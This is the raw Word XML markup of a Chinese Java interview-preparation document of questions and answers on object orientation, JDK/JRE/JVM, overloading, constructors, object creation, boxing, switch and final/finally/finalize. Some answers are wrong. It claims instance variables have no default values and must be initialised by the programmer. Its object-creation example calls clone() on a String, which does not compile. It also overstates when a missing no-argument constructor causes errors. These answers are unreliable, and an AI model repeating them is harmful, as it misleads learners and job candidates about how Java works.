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300" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>《Java八股文》答案版（待完善）</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一、Java基础 44 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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解释下什么是面向对象？面向对象和面向过程的区别？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面向对象（Object Oriented，OO）是一种程序设计的思想和方法，强调将系统中的各个组成部分看作对象，通过对象之间的交互来完成系统功能。每个对象都是具有特定属性和行为的实体，可以封装数据和方法，继承其他对象的特性，以及与其他对象进行通信和协作。面向对象的程序设计将问题看作是由许多相互协作的对象所组成的，通过分析问题域中的对象、关系和交互来进行抽象和建模，最终实现一个面向对象的程序系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面向过程（Procedure Oriented，PO）是一种程序设计的思想和方法，强调程序应该按照一定的顺序依次执行一系列的操作，通过对数据进行处理来达到预定的目标。面向过程的程序设计以任务和流程为中心，强调数据和操作之间的直接关系。程序被分解成一系列的子程序或函数，每个函数实现一个具体的操作，由主函数控制调用顺序和参数传递，最终完成整个程序的功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面向对象和面向过程的主要区别在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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抽象程度不同：面向过程更注重流程和算法，面向对象更注重抽象和模型化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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数据封装性不同：面向过程的数据封装性较弱，数据和操作之间的联系较紧密；面向对象的数据封装性较强，数据和操作之间的联系较松散，对外部的访问只能通过对象的接口进行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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继承和多态性不同：面向过程没有继承和多态的概念，面向对象支持继承和多态，可以通过继承和多态来实现代码重用和扩展性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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设计思想不同：面向过程更注重过程和算法的设计，面向对象更注重问题的建模和设计，强调的是问题域中的对象、关系和交互。</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综上所述，面向对象的设计更适合处理复杂的系统，能够更好地应对变化和扩展；而面向过程更适合处理简单的问题，代码比较简单直接，易于理解和维护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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面向对象的三大特性？分别解释下？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面向对象编程具有三大特性，即封装、继承和多态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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封装（Encapsulation）：封装是指将对象的属性和行为组合在一起，形成一个有机的整体，并对外部世界隐藏对象的细节。这样做的好处是可以保证对象的安全性，防止外部直接访问和修改对象内部的数据，只能通过对象提供的方法来操作对象的数据，从而更好地控制对象的行为和状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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继承（Inheritance）：继承是指一个新的类可以继承已有类的属性和方法，从而减少了代码的冗余和重复性。继承使得对象之间可以形成一种层次关系，提高了代码的可重用性和可扩展性，同时也增加了代码的灵活性和可维护性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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多态（Polymorphism）：多态是指不同的对象可以对同一个消息作出不同的响应，即同一种类型的对象，在不同的情况下表现出不同的行为。这种行为主要体现在方法的重载和覆盖上。多态使得程序更加灵活和可扩展，同时也提高了代码的可读性和可维护性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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JDK、JRE、JVM 三者之间的关系？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JDK、JRE、JVM 是 Java 开发中三个重要的概念，它们之间的关系如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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JVM（Java Virtual Machine，Java 虚拟机）：JVM 是 Java 程序的运行环境，它是一个虚拟计算机，可以执行 Java 字节码文件。JVM 负责将 Java 字节码文件翻译成计算机可执行的机器码，并在计算机上执行程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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JRE（Java Runtime Environment，Java 运行环境）：JRE 是 Java 程序的运行环境，它包括 JVM 和 Java 类库。Java 类库是 Java 开发中常用的一些类和方法的集合，包括 Java 核心类库、Java 扩展类库和 Java 服务类库等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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JDK（Java Development Kit，Java 开发工具包）：JDK 是 Java 程序的开发工具包，它包括了 Java 编译器、JRE、JavaDoc 等开发工具。JDK 可以用于开发 Java 应用程序、Java Applet、Java Servlet、JavaBean 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因此，JRE 包括了 JVM 和 Java 类库，用于运行 Java 程序；而 JDK 包括了 JRE，同时还包含了用于开发 Java 程序的开发工具；JVM 是 Java 程序的运行环境，负责将 Java 字节码文件翻译成计算机可执行的机器码，并在计算机上执行程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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重载和重写的区别？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重载（Overloading）和重写（Overriding）是 Java 中两个常用的概念，它们的区别如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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方法重载（Overloading）：是指在一个类中定义了多个同名的方法，但它们的参数类型、个数或顺序不同。编译器根据方法调用时传入的实参类型和个数，在所有符合条件的方法中，选择一个最为匹配的方法进行调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方法重载的特点是：同一个类中出现方法名相同、参数列表不同的多个方法，返回值类型可以相同也可以不同，调用方法时，编译器根据实参的个数、类型、顺序等信息确定调用哪个方法。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方法重写（Overriding）：是指在子类中定义一个与父类中同名、同参数列表、同返回类型的方法，并且该方法的访问修饰符和抛出的异常类型都不能比父类中的方法更严格。当子类对象调用该方法时，会覆盖父类中的同名方法，执行子类中的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方法重写的特点是：子类中定义了一个与父类中同名、同参数列表、同返回类型的方法，子类中的方法覆盖了父类中的方法，调用方法时，实际上调用的是子类中的方法。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总的来说，方法重载是在同一个类中，方法名相同，参数列表不同，返回值类型可以相同也可以不同，用于提高代码的复用性；方法重写是在子类中对父类中已有的方法进行重新定义，用于实现多态性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中是否可以重写一个 private 或者 static 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 中不允许重写（Override）一个私有（private）或者静态（static）方法。原因如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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私有方法只在当前类中可见，无法被子类访问和继承，因此也就无法重写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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静态方法是类级别的方法，它属于类而不属于对象，因此子类不能重写父类中的静态方法。当子类中定义一个与父类中同名的静态方法时，实际上是定义了一个全新的方法，而不是对父类中的静态方法进行了重写。</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虽然 Java 中不允许对私有方法和静态方法进行重写，但是可以在子类中定义一个与父类中同名、同参数列表的新方法，与父类中的方法没有任何关系，这样做不会引起重写的语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法有哪些特性？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 中的构造方法（Constructor）是用于创建对象并初始化对象状态的特殊方法。它与普通方法的区别在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法的方法名必须与类名相同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法没有返回值类型，连 void 也不行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法在创建对象时被自动调用，且只被调用一次。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法可以重载，即同一个类中可以有多个构造方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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如果一个类没有定义任何构造方法，则编译器会默认生成一个无参数的构造方法。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其他特性包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法可以带有参数，用于在创建对象时传递初始化参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法可以被访问修饰符所修饰，比如 public、private、protected，用于控制构造方法的可见性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法可以调用其他构造方法，使用 this 关键字调用同一个类中的另一个构造方法，或者使用 super 关键字调用父类中的构造方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法可以抛出异常，如果在构造方法中发生异常，则对象创建失败，构造方法将立即返回，并抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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构造方法不能被子类继承或者重写，但是可以在子类的构造方法中使用 super 关键字调用父类的构造方法来初始化父类的成员变量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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在 Java 中定义一个不做事且没有参数的构造方法有什么作用？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定义一个不做事且没有参数的构造方法通常称为默认构造方法。如果一个类中没有明确定义任何构造方法，则编译器会自动生成一个默认构造方法。如果类中定义了其他构造方法，但没有定义默认构造方法，则需要显式地定义一个默认构造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这种类型的构造方法虽然看似无用，但实际上具有以下几个作用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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实例化对象：当我们使用 new 关键字创建一个对象时，会自动调用该类的默认构造方法，如果没有定义默认构造方法，则编译器会报错。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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子类继承：如果一个类没有定义任何构造方法，则它的子类也会自动继承默认构造方法，这有助于子类创建对象时调用默认构造方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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反射操作：在Java中，反射机制可以使用Class类的newInstance()方法创建对象，该方法会默认调用类的默认构造方法来实例化对象。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总之，在Java中定义一个不做事且没有参数的构造方法可以确保类的实例化过程正确进行，并且有助于编写更加健壮的代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中创建对象的几种方式？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在Java中，创建对象的方式有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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new 关键字：使用 new 关键字可以在堆内存中为一个类创建一个新的对象实例。例如，下面的代码创建了一个String类的对象：</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1ABC9C" w:sz="12" w:space="0"/>
          <w:shd w:val="clear" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t>javaCopy codeString str = new String();</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2.使用 Class 类的 newInstance() 方法：使用 Class 类的 newInstance() 方法可以动态地创建一个类的对象，该方法调用的是类的默认构造方法。例如，下面的代码创建了一个String类的对象：</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codeString str = String.class.newInstance();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3.使用 Constructor 类的 newInstance() 方法：使用 Constructor 类的 newInstance() 方法可以根据传入的参数创建一个类的对象，该方法可以调用指定的构造方法。例如，下面的代码创建了一个String类的对象：</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codeConstructor&lt;String&gt; constructor = String.class.getConstructor(String.class);</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String str = constructor.newInstance("Hello World");</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4.使用 clone() 方法：使用 clone() 方法可以复制一个已有的对象，创建一个新的对象。要使用该方法，需要保证被复制的对象实现了 Cloneable 接口。例如，下面的代码创建了一个String类的对象：</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codeString str = new String("Hello World");</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String str2 = (String) str.clone();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5.使用反序列化：使用反序列化可以从文件或网络中读取一个对象的二进制表示，并转换成一个对象。要使用该方法，需要保证被读取的类实现了 Serializable 接口。例如，下面的代码创建了一个String类的对象：</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codeString str = "Hello World";</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ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("test.txt"));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out.writeObject(str);</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ObjectInputStream in = new ObjectInputStream(new FileInputStream("test.txt"));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String str2 = (String) in.readObject();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总之，根据不同的应用场景和需求，我们可以选择适当的方式来创建对象</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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抽象类和接口有什么区别？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抽象类和接口是Java中两种不同的抽象机制，它们的区别如下：</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实现方式：抽象类是一个类，可以包含成员变量、成员方法、构造方法等，而接口是一种纯抽象的定义，只包含常量和抽象方法的定义，没有具体实现。</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继承：子类只能继承一个抽象类，而接口可以被一个类实现多个。由于Java中不支持多重继承，因此接口提供了一种实现多个行为的方式。</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构造方法：抽象类可以有构造方法，而接口不能有构造方法。</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访问修饰符：抽象类中的成员变量和成员方法可以使用任何访问修饰符，而接口中的成员变量和成员方法默认都是 public 的。</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变量类型：抽象类中可以有普通成员变量，而接口中只能定义常量。</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默认实现：抽象类中可以包含实现方法，子类可以直接继承这些实现方法，而接口中的方法只能是抽象方法，子类必须实现这些方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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设计目的：抽象类的设计目的是为了代码复用和扩展，而接口的设计目的是为了实现多态性和解耦。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总之，抽象类和接口各有自己的特点和用途，根据具体的应用场景和设计需求，我们可以选择适当的抽象机制来实现我们的代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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静态变量和实例变量的区别？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在Java中，静态变量和实例变量是两种不同类型的变量，它们的区别如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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存储位置：静态变量属于类，存储在类的静态存储区中；实例变量属于对象，存储在堆内存中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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生命周期：静态变量的生命周期随着类的加载而开始，随着类的卸载而结束；实例变量的生命周期随着对象的创建而开始，随着对象的销毁而结束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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访问方式：可以通过类名直接访问静态变量，也可以通过对象访问静态变量；而实例变量只能通过对象访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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初始值：静态变量可以由程序员指定初始值，如果没有指定初始值，则使用默认值；而实例变量没有默认值，必须由程序员指定初始值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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内存占用：由于静态变量属于类，只有一个拷贝，因此不会随着对象的创建而占用额外的内存空间；而实例变量随着对象的创建而占用额外的内存空间。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总之，静态变量和实例变量各有自己的特点和用途，根据具体的应用场景和设计需求，我们可以选择适当的变量类型来实现我们的代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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short s1 = 1；s1 = s1 + 1；有什么错？那么 short s1 = 1; s1 += 1；呢？有没有错误？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第一行代码中，将一个整型常量 1 赋值给 short 类型的变量 s1，这是可以编译通过的，因为 1 在 short 类型的取值范围内。</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而在第二行代码中，s1 + 1 的计算结果是一个整型值，需要将整型值强制转换成 short 类型才能赋值给 s1，但是这个过程会导致精度损失，所以编译器会报错，提示“不兼容的类型: 从int转换到short可能会有损失”。</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第三行代码中，使用了复合赋值运算符 +=，相当于 s1 = (short)(s1 + 1)，由于复合赋值运算符会自动进行类型转换，所以不会出现精度损失的问题，代码可以正常编译通过。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综上所述，第二行代码有错误，第三行代码没有错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Integer 和 int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在Java中，Integer是一个类，而int是一种基本数据类型。下面是Integer和int之间的区别：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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可空性：Integer可以为null，而int不能为null。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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存储空间：Integer是一个对象，需要分配内存空间存储对象本身和额外的对象头信息，而int是一个原始数据类型，只需要分配固定大小的内存空间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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自动装箱和拆箱：当需要将一个int类型的变量传递给一个需要Integer类型参数的方法时，Java会自动将int类型的值装箱成对应的Integer对象；当需要从一个Integer对象中获取int类型的值时，Java会自动将Integer对象拆箱成int类型的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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性能：由于Integer是一个对象，所以在进行运算和比较等操作时，需要进行额外的对象创建、拆箱、装箱和垃圾回收等操作，所以性能不如int类型。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综上所述，Integer和int各有自己的特点和用途，需要根据具体的应用场景和设计需求进行选择。在一般情况下，建议使用int类型来进行数值计算和比较等操作，而在需要支持null值的情况下，可以考虑使用Integer。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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装箱和拆箱的区别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在Java中，装箱（Boxing）和拆箱（Unboxing）是指将基本数据类型转换成对应的包装类型对象和将包装类型对象转换成基本数据类型的过程。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装箱：将基本数据类型转换成对应的包装类型对象。例如：将int类型的变量x装箱成Integer对象，可以使用如下代码：</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codeint x = 10;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Integer y = Integer.valueOf(x); // 装箱操作</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拆箱：将包装类型对象转换成基本数据类型。例如：将Integer对象y拆箱成int类型的变量z，可以使用如下代码：</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arduinoCopy codeint z = y.intValue(); // 拆箱操作</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需要注意的是，在Java 5及以上版本中，装箱和拆箱操作可以通过自动装箱和自动拆箱特性简化操作。例如：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codeint x = 10;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Integer y = x; // 自动装箱操作</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int z = y; // 自动拆箱操作</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自动装箱和自动拆箱可以使代码更加简洁易读，但在大量数据操作时，可能会带来性能问题，因为每次装箱和拆箱都会涉及到对象的创建和销毁。因此，在需要频繁进行数据操作时，建议直接使用基本数据类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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switch 语句能否作用在 byte 上，能否作用在 long 上，能否作用在 String 上？</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在Java中，switch语句可以作用在byte、short、int、char、枚举类型（JDK5.0后）以及String类型（JDK7.0后）上，但不能作用在long类型上。</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在使用switch语句时，需要注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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switch语句的表达式必须是一个可以被整数类型（byte、short、int、char）或枚举类型表示的值，或者是一个String类型的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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case标签中的值必须是一个常量表达式，即在编译时就能确定的值，不能是变量或者非常量表达式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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在case语句中，如果没有使用break或return语句，会继续执行下一个case语句，直到遇到break或return语句或者执行到switch语句结束为止。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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如果所有的case语句都不匹配，那么会执行default语句，如果没有default语句，那么switch语句就不做任何操作。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因此，可以在byte、short、int、char、枚举类型和String类型上使用switch语句，但不能在long类型上使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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final、finally、finalize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final、finally、finalize是Java中三个不同的概念，它们的含义和作用分别如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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final：final关键字用于修饰变量、方法和类，表示不可修改、不可继承和不可重写。对于变量，一旦被赋值就不能再被修改；对于方法，不能被子类重写；对于类，不能被继承。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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finally：finally是一个关键字，用于定义在try语句块中的一个代码块，在程序执行完try和catch块后无论是否发生异常，finally块中的代码都会被执行。通常用于释放资源、关闭文件等操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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finalize：finalize()是Object类中的一个方法，是垃圾回收机制在对象被回收之前调用的方法。finalize()方法可以被子类重写，用于在对象被回收之前执行一些清理操作。但是，由于垃圾回收机制的不确定性，finalize()方法并不保证一定会被执行，因此不建议在程序中过度依赖它。</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综上所述，final、finally和finalize是Java中三个不同的概念，分别表示不可修改、不可继承和不可重写、无论是否发生异常都会被执行的代码块、在对象被回收之前执行的方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 和 equals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在Java中，"=="是一个运算符，用于比较两个变量是否引用同一个对象，而"equals"是Object类中的一个方法，用于比较两个对象是否相等。它们的区别如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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"=="比较的是两个变量的引用是否指向同一个对象，即比较它们的地址是否相同。而"equals"比较的是两个对象的内容是否相同，即比较它们的值是否相等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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"=="适用于所有的数据类型，包括基本数据类型和引用数据类型；而"equals"方法只适用于引用类型的比较。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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"=="比较的是两个变量的值是否相等，而"equals"比较的是两个对象的值是否相等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
